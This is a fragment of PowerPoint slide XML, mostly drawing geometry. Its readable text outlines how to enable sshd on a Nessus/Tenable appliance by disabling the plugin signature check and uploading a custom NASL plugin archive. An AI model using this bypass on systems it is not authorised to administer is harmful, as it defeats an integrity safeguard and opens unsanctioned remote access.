              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y%m%d%H%M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376076"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zcvvf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> enable_sshd.tar.gz custom_feed_info.inc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enable_sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasl</a:t>
            </a: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2. Upload the custom plugin (i.e., enable_sshd.tar.gz) from admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37607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↪ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://community.tenable.com/thread/9384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3. Go to System &gt; Configuration &gt; Plugins / Feed and update plugins.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76076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37607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↪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or upload the following archive manually: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https://downloads.nessus.org/get.php?u=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[PluginSubscriptionLogin]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[PluginSubscriptionPassword]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;f=sc-plugins-diff.tar.gz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0007" y="1049487"/>
            <a:ext cx="2337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/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custom_feed_info.inc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89144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28B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28B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7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28B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28B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503"/>
            <a:ext cx="9144000" cy="3541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67" y="378366"/>
            <a:ext cx="6202109" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Disable Signature Check </a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Freeform: Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516481" y="1364685"/>
            <a:ext cx="1343777" cy="193972"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 138347 h 1691375"/>
              <a:gd name="connsiteX1" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 152861 h 1691375"/>
              <a:gd name="connsiteX2" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 1691375 h 1691375"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 120265 h 1673293"/>
              <a:gd name="connsiteX1" fmla="*/ 912326 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 76722 h 1673293"/>
              <a:gd name="connsiteX2" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 134779 h 1673293"/>
              <a:gd name="connsiteX3" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY3" fmla="*/ 1673293 h 1673293"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 47659 h 1600687"/>
              <a:gd name="connsiteX1" fmla="*/ 912326 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 4116 h 1600687"/>
              <a:gd name="connsiteX2" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 62173 h 1600687"/>
              <a:gd name="connsiteX3" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY3" fmla="*/ 1600687 h 1600687"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3237722"/>
              <a:gd name="connsiteY0" fmla="*/ 1215 h 1843492"/>
              <a:gd name="connsiteX1" fmla="*/ 688391 w 3237722"/>
              <a:gd name="connsiteY1" fmla="*/ 246921 h 1843492"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 3237722"/>
              <a:gd name="connsiteY2" fmla="*/ 304978 h 1843492"/>
              <a:gd name="connsiteX3" fmla="*/ 3237722 w 3237722"/>
              <a:gd name="connsiteY3" fmla="*/ 1843492 h 1843492"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3237722"/>
              <a:gd name="connsiteY0" fmla="*/ 2678 h 1844955"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 3237722"/>
              <a:gd name="connsiteY1" fmla="*/ 95984 h 1844955"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 3237722"/>
              <a:gd name="connsiteY2" fmla="*/ 306441 h 1844955"/>
              <a:gd name="connsiteX3" fmla="*/ 3237722 w 3237722"/>
              <a:gd name="connsiteY3" fmla="*/ 1844955 h 1844955"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1953752"/>
              <a:gd name="connsiteY0" fmla="*/ 2678 h 850545"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1953752"/>
              <a:gd name="connsiteY1" fmla="*/ 95984 h 850545"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 1953752"/>
              <a:gd name="connsiteY2" fmla="*/ 306441 h 850545"/>
              <a:gd name="connsiteX3" fmla="*/ 1953752 w 1953752"/>
              <a:gd name="connsiteY3" fmla="*/ 850545 h 850545"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1953752"/>
              <a:gd name="connsiteY0" fmla="*/ 17088 h 864955"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1953752"/>
              <a:gd name="connsiteY1" fmla="*/ 110394 h 864955"/>
              <a:gd name="connsiteX2" fmla="*/ 1953752 w 1953752"/>
              <a:gd name="connsiteY2" fmla="*/ 864955 h 864955"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 17088 h 232495"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 110394 h 232495"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 232495 h 232495"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3281 h 218688"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 8958 h 218688"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218688 h 218688"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3281 h 218688"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 8958 h 218688"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218688 h 218688"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 5177 h 220584"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 18474 h 220584"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 220584 h 220584"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 13297 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 13297 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3404 h 218811"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 16701 h 218811"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218811 h 218811"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1478689"/>
              <a:gd name="connsiteY0" fmla="*/ 13 h 432777"/>
              <a:gd name="connsiteX1" fmla="*/ 763678 w 1478689"/>
              <a:gd name="connsiteY1" fmla="*/ 230667 h 432777"/>
              <a:gd name="connsiteX2" fmla="*/ 1478689 w 1478689"/>
              <a:gd name="connsiteY2" fmla="*/ 432777 h 432777"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1343777"/>
              <a:gd name="connsiteY0" fmla="*/ 13 h 238600"/>
              <a:gd name="connsiteX1" fmla="*/ 763678 w 1343777"/>
              <a:gd name="connsiteY1" fmla="*/ 230667 h 238600"/>
              <a:gd name="connsiteX2" fmla="*/ 1343777 w 1343777"/>
              <a:gd name="connsiteY2" fmla="*/ 192935 h 238600"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1343777"/>
              <a:gd name="connsiteY0" fmla="*/ 1050 h 193972"/>
              <a:gd name="connsiteX1" fmla="*/ 681232 w 1343777"/>
              <a:gd name="connsiteY1" fmla="*/ 21842 h 193972"/>
              <a:gd name="connsiteX2" fmla="*/ 1343777 w 1343777"/>
              <a:gd name="connsiteY2" fmla="*/ 193972 h 19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3777" h="193972">
                <a:moveTo>
                  <a:pt x="0" y="1050"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204634" y="-868"/>
                  <a:pt x="518508" y="-2910"/>
                  <a:pt x="681232" y="21842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="946239" y="65082"/>
                  <a:pt x="1101630" y="124062"/>
                  <a:pt x="1343777" y="193972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28" name="Freeform: Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2012063" y="1765785"/>
            <a:ext cx="1690705" cy="1563273"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 138347 h 1691375"/>
              <a:gd name="connsiteX1" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 152861 h 1691375"/>
              <a:gd name="connsiteX2" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 1691375 h 1691375"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 120265 h 1673293"/>
              <a:gd name="connsiteX1" fmla="*/ 912326 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 76722 h 1673293"/>
              <a:gd name="connsiteX2" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 134779 h 1673293"/>
              <a:gd name="connsiteX3" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY3" fmla="*/ 1673293 h 1673293"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 47659 h 1600687"/>
              <a:gd name="connsiteX1" fmla="*/ 912326 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 4116 h 1600687"/>
              <a:gd name="connsiteX2" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 62173 h 1600687"/>
              <a:gd name="connsiteX3" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY3" fmla="*/ 1600687 h 1600687"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3237722"/>
              <a:gd name="connsiteY0" fmla="*/ 1215 h 1843492"/>
              <a:gd name="connsiteX1" fmla="*/ 688391 w 3237722"/>
              <a:gd name="connsiteY1" fmla="*/ 246921 h 1843492"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 3237722"/>
              <a:gd name="connsiteY2" fmla="*/ 304978 h 1843492"/>
              <a:gd name="connsiteX3" fmla="*/ 3237722 w 3237722"/>
              <a:gd name="connsiteY3" fmla="*/ 1843492 h 1843492"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3237722"/>
              <a:gd name="connsiteY0" fmla="*/ 2678 h 1844955"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 3237722"/>
              <a:gd name="connsiteY1" fmla="*/ 95984 h 1844955"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 3237722"/>
              <a:gd name="connsiteY2" fmla="*/ 306441 h 1844955"/>
              <a:gd name="connsiteX3" fmla="*/ 3237722 w 3237722"/>
              <a:gd name="connsiteY3" fmla="*/ 1844955 h 1844955"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1953752"/>
              <a:gd name="connsiteY0" fmla="*/ 2678 h 850545"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1953752"/>
              <a:gd name="connsiteY1" fmla="*/ 95984 h 850545"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 1953752"/>
              <a:gd name="connsiteY2" fmla="*/ 306441 h 850545"/>
              <a:gd name="connsiteX3" fmla="*/ 1953752 w 1953752"/>
              <a:gd name="connsiteY3" fmla="*/ 850545 h 850545"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1953752"/>
              <a:gd name="connsiteY0" fmla="*/ 17088 h 864955"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1953752"/>
              <a:gd name="connsiteY1" fmla="*/ 110394 h 864955"/>
              <a:gd name="connsiteX2" fmla="*/ 1953752 w 1953752"/>
              <a:gd name="connsiteY2" fmla="*/ 864955 h 864955"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 17088 h 232495"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 110394 h 232495"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 232495 h 232495"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3281 h 218688"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 8958 h 218688"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218688 h 218688"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3281 h 218688"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 8958 h 218688"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218688 h 218688"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 5177 h 220584"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 18474 h 220584"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 220584 h 220584"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 13297 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 13297 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1279382"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 451627"/>
              <a:gd name="connsiteX1" fmla="*/ 564371 w 1279382"/>
              <a:gd name="connsiteY1" fmla="*/ 249517 h 451627"/>
              <a:gd name="connsiteX2" fmla="*/ 1279382 w 1279382"/>
              <a:gd name="connsiteY2" fmla="*/ 451627 h 451627"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1751822"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1495567"/>
              <a:gd name="connsiteX1" fmla="*/ 564371 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 24951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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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381491 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 889597 h 1495567"/>
              <a:gd name="connsiteX2" fmla="*/ 1751822 w 1751822"/>
              <a:gd name="connsiteY2" fmla="*/ 1495567 h 1495567"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1804287"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1712925"/>
              <a:gd name="connsiteX1" fmla="*/ 433956 w 1804287"/>
              <a:gd name="connsiteY1" fmla="*/ 1106955 h 1712925"/>
              <a:gd name="connsiteX2" fmla="*/ 1804287 w 1804287"/>
              <a:gd name="connsiteY2" fmla="*/ 1712925 h 1712925"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1804287"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1712925"/>
              <a:gd name="connsiteX1" fmla="*/ 411471 w 1804287"/>
              <a:gd name="connsiteY1" fmla="*/ 934569 h 1712925"/>
              <a:gd name="connsiteX2" fmla="*/ 1804287 w 1804287"/>
              <a:gd name="connsiteY2" fmla="*/ 1712925 h 1712925"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1646890"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1548033"/>
              <a:gd name="connsiteX1" fmla="*/ 411471 w 1646890"/>
              <a:gd name="connsiteY1" fmla="*/ 934569 h 1548033"/>
              <a:gd name="connsiteX2" fmla="*/ 1646890 w 1646890"/>
              <a:gd name="connsiteY2" fmla="*/ 1548033 h 1548033"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1690705"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1563273"/>
              <a:gd name="connsiteX1" fmla="*/ 411471 w 1690705"/>
              <a:gd name="connsiteY1" fmla="*/ 934569 h 1563273"/>
              <a:gd name="connsiteX2" fmla="*/ 1690705 w 1690705"/>
              <a:gd name="connsiteY2" fmla="*/ 1563273 h 1563273"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1690705"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1563273"/>
              <a:gd name="connsiteX1" fmla="*/ 449571 w 1690705"/>
              <a:gd name="connsiteY1" fmla="*/ 919329 h 1563273"/>
              <a:gd name="connsiteX2" fmla="*/ 1690705 w 1690705"/>
              <a:gd name="connsiteY2" fmla="*/ 1563273 h 156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705" h="1563273">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2704" y="165722"/>
                  <a:pt x="313517" y="837427"/>
                  <a:pt x="449571" y="919329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="596468" y="1118779"/>
                  <a:pt x="1448558" y="1493363"/>
                  <a:pt x="1690705" y="1563273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46740" y="3265687"/>
            <a:ext cx="481329" cy="264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Freeform: Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323464" y="2176535"/>
            <a:ext cx="3395680" cy="1204692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 138347 h 1691375"/>
              <a:gd name="connsiteX1" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 152861 h 1691375"/>
              <a:gd name="connsiteX2" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 1691375 h 1691375"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 120265 h 1673293"/>
              <a:gd name="connsiteX1" fmla="*/ 912326 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 76722 h 1673293"/>
              <a:gd name="connsiteX2" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 134779 h 1673293"/>
              <a:gd name="connsiteX3" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY3" fmla="*/ 1673293 h 1673293"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3461657"/>
              <a:gd name="connsiteY0" fmla="*/ 47659 h 1600687"/>
              <a:gd name="connsiteX1" fmla="*/ 912326 w 3461657"/>
              <a:gd name="connsiteY1" fmla="*/ 4116 h 1600687"/>
              <a:gd name="connsiteX2" fmla="*/ 1661886 w 3461657"/>
              <a:gd name="connsiteY2" fmla="*/ 62173 h 1600687"/>
              <a:gd name="connsiteX3" fmla="*/ 3461657 w 3461657"/>
              <a:gd name="connsiteY3" fmla="*/ 1600687 h 1600687"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3237722"/>
              <a:gd name="connsiteY0" fmla="*/ 1215 h 1843492"/>
              <a:gd name="connsiteX1" fmla="*/ 688391 w 3237722"/>
              <a:gd name="connsiteY1" fmla="*/ 246921 h 1843492"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 3237722"/>
              <a:gd name="connsiteY2" fmla="*/ 304978 h 1843492"/>
              <a:gd name="connsiteX3" fmla="*/ 3237722 w 3237722"/>
              <a:gd name="connsiteY3" fmla="*/ 1843492 h 1843492"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3237722"/>
              <a:gd name="connsiteY0" fmla="*/ 2678 h 1844955"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 3237722"/>
              <a:gd name="connsiteY1" fmla="*/ 95984 h 1844955"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 3237722"/>
              <a:gd name="connsiteY2" fmla="*/ 306441 h 1844955"/>
